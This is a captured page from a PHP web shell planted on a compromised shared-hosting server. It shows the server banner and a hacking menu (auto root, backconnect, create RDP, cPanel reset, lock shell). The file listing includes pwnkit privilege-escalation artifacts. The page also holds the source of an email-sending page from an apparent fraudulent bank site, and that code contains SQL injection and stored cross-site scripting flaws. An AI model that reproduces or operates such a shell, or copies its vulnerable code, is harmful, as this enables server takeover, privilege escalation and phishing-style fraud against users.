Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
public_html /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_amount.php
1
KB
-rw-r--r--
add_code.php
3.24
KB
-rw-r--r--
add_user.php
15.1
KB
-rw-r--r--
admin_transactions.php
2.17
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
bulksms2.php
1.98
KB
-rw-r--r--
bulksms20.php
8.42
KB
-rw-r--r--
contact_students.php
1.76
KB
-rw-r--r--
db.php
30
B
-rw-r--r--
del_deposit.php
425
B
-rw-r--r--
delete.php
2.66
KB
-rw-r--r--
delete_banner.php
721
B
-rw-r--r--
delete_beneficiary.php
368
B
-rw-r--r--
delete_code.php
371
B
-rw-r--r--
delete_loan.php
355
B
-rw-r--r--
delete_user.php
991
B
-rw-r--r--
edit_banner.php
3.1
KB
-rw-r--r--
edit_transfer.php
3.18
KB
-rw-r--r--
edit_user.php
18.08
KB
-rw-r--r--
editsettings.php
2.54
KB
-rw-r--r--
error_log
160.39
KB
-rw-r--r--
function_users.php
6.17
KB
-rw-r--r--
functions.php
7.15
KB
-rw-r--r--
home.php
4.07
KB
-rw-r--r--
index -.html
41.78
KB
-rw-r--r--
index.php
56
B
-r--r--r--
insert_banners.php
2.84
KB
-rw-r--r--
login.php
1.57
KB
-rw-r--r--
login_admin.php
3.11
KB
-rw-r--r--
logout.php
164
B
-rw-r--r--
member.php
23.81
KB
-rw-r--r--
picupload.php
2.12
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register_admin.php
8.45
KB
-rw-r--r--
remove_amount.php
1.01
KB
-rw-r--r--
searchmembers.php
2.94
KB
-rw-r--r--
send_email.php
6.9
KB
-rw-r--r--
testimony.php
3.15
KB
-rw-r--r--
transactions.php
2.66
KB
-rw-r--r--
upload_files.php
2.59
KB
-rw-r--r--
user_error.php
188
B
-rw-r--r--
user_transfer.php
6.3
KB
-rw-r--r--
user_withdrawal.php
4.85
KB
-rw-r--r--
view_admin.php
2.84
KB
-rw-r--r--
view_banners.php
2.23
KB
-rw-r--r--
view_beneficiary.php
3.74
KB
-rw-r--r--
view_cards.php
3.03
KB
-rw-r--r--
view_codes.php
3.07
KB
-rw-r--r--
view_loans.php
2.8
KB
-rw-r--r--
view_referrals.php
1.67
KB
-rw-r--r--
view_users.php
4.37
KB
-rw-r--r--
viewconversation.php
5.25
KB
-rw-r--r--
viewmessage.php
2.4
KB
-rw-r--r--
viewmessages.php
3.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : send_email.php
<?php include("includes/header.php"); include("includes/navbar.php"); //include("includes/sidebar.php"); ?> <title> Send Emails</title> <div class="card shadow mb-4"> <!-- Card Header - Dropdown --> <div class="card-header py-3 d-flex flex-row align-items-center justify-content-between"> <h3 class="m-0 font-weight-bold text-primary"> Send Emails</h3> </div> <br/> <div class="card-header py-3 d-flex flex-row align-items-center justify-content-between"> <form method="post" action="" enctype="multipart/form-data"> <div class="form-group"><b>Recipient Email</b><br/> <input type="email" name="email" value="" class="form-control" placeholder="Enter Email" required="" /> <br/> <div class="form-group"><b>Message Subject</b><br/> <input type="text" name="subject" value="Account Notification" class="form-control" placeholder="Enter subject"/> <br/> <b>Message Body</b><br/> <textarea class="form-control" name="message" rows="4" id="comment" placeholder="Enter message..."></textarea> <br/> <button class="btn btn-success" type="submit" name="submit"><i class="fa fa-envelope"></i> send mail</button> </form> </div> <?php if(isset($_POST['submit'])){ $email = $_POST['email']; $message = $_POST['message']; $subject = $_POST['subject']; $domain_name="www.midwest-tb.com"; $site_name ="Midwestern Trust Bank"; $site_name2 ="Your Financial status is in good hands"; $webmail="support@midwest-tb.com"; include("functions/mailer.php"); $mail = new PHPMailer; $mail->From = $webmail; $mail->FromName = $site_name; //To address and name $mail->addAddress($email); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = $subject; $mail->Body = "<img src='https://midwest-tb.com/img/email2.jpg' width='90%'><br/><br/>".$message2."<br/><br/> <small style='white-space: pre-wrap;'><hr/> Please do not share this token with a third party. <small style='white-space: pre-wrap;'><hr/> Kindly bear in mind that ".$site_name." top priority is the privacy of our users. ".$site_name." will never understand any circumstances, sell it distribute your cell phone number to third parties or clients for whom you have not approved. ".$site_name."will never directly market to you any services for which you have not approved. ".$site_name."will never distribute any personal information about you including your phone number, name, billing information or any other piece of identifying information. Thanks for choosing ".$site_name." Regards, ".$site_name."</small><br/>"; if(!$mail->send()) { // echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message has been sucessfully sent to ".$email; $sql="INSERT INTO emails(email, time, subject, message) VALUES ('$email', '$current_time', '$subject', '$message')"; $result = mysqli_query($con, $sql); } } ?> </div> </div> </div> <table class="table table-responsive" style="font-size:14px;"> <thead> <tr> <th>EMAIL:</th> <th>SUBJECT:</th> <th>MESSAGE:</th> <th>TIME</th> <th>Option</th> </tr> </thead> <?php $offset= 0; $page_result= 100; if(isset($_GET['pageno'])){ $page_value = $_GET['pageno']; if($page_value > 1){ $offset= ($page_value - 1) * $page_result; } } $sql = "SELECT * FROM emails ORDER BY id DESC LIMIT $offset, $page_result"; $run= mysqli_query($con, $sql); $sql2 = "SELECT id FROM emails ORDER BY id"; $run2= mysqli_query($con, $sql2); $count = mysqli_num_rows($run2); echo '<br/><h2><center> '.$count.' Sent items</h2><br/></center>'; while($row= mysqli_fetch_array($run)){ $id = $row ['id']; $email = $row ['email']; $subject = $row ['subject']; $message = $row ['message']; $time = $row ['time']; ?> <tbody> <tr class="div<?php echo $id?>"> <td><?php echo $email?></td> <td><?php echo $subject?></td> <td><?php echo $message?></td> <td><?php echo $time?></td> <td> <a href="#" class="btn btn-danger" onclick="DeleteEmail(<?php echo $id?>)">Delete</a></td> </tr> </tbody> <?php } ?> </table> </div> </div> </section> </div> </div> </section> <script type="text/javascript"> function DeleteEmail(div){ confirm('Would only be deleted from Admin dashboard not from Recipient mailbox?'); $.ajax({ url:"functions/delete_email.php?id="+div+"&delete=yes", success:function(data) { $(".div"+div+"").hide(); } }); } </script> <div id="pagination"><br/><ul> <?php $result =mysqli_query($con, "SELECT id from emails"); $numrows=mysqli_num_rows($result); $pagecount = $numrows; // Total number of rows $num = $pagecount / $page_result ; if($_GET['pageno'] > 1) { echo "<li><a href = 'send_email.php?pageno=".($_GET['pageno'] - 1)." '> Prev </a></li>"; } if($_GET['pageno'] < $num) { echo "<li><a href = 'send_email.php?pageno=".($_GET['pageno'] + 1)." '> next </a></li>"; } if($_GET['pageno']+1 <= $num){ for($i = $_GET['pageno'] ; $i <= $_GET['pageno']+2 ; $i++) { echo "<li><a href = 'send_email.php?pageno=". $i." '> ". $i ."</a></li>"; } } ?> </div> </div></div> <?php // include("functions/plans.php");?> <?php include("includes/footer.php"); /* $domain_name="www.midwest-tb.com"; $site_name ="Midwestern Trust Bank"; $site_name2 ="Your Financial status is in good hands"; $webmail="support@midwest-tb.com"; include("functions/mailer.php"); $mail = new PHPMailer; $mail->From = $webmail; $mail->FromName = $site_name; //To address and name $mail->addAddress($email); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "2FA Notice"; $mail->Body = "<img src='https://midwest-tb.com/img/email2.jpg' width='90%'><br/><br/> Dear ".$user.",<br/> Your verification OTP is: <center><h1>".$main_otp."</h1></center> Please do not share this token with a third party. <small style='white-space: pre-wrap;'><hr/> Kindly bear in mind that ".$site_name." top priority is the privacy of our users. ".$site_name." will never understand any circumstances, sell it distribute your cell phone number to third parties or clients for whom you have not approved. ".$site_name."will never directly market to you any services for which you have not approved. ".$site_name."will never distribute any personal information about you including your phone number, name, billing information or any other piece of identifying information. Thanks for choosing ".$site_name." Regards, ".$site_name."</small><br/>"; if(!$mail->send()) { // echo "Mailer Error: " . $mail->ErrorInfo; } else { echo '<script>alert("OTP has been sent your email")</script>';?> <script type="text/javascript"> window.location.href = "otp" </script> <?php }
Close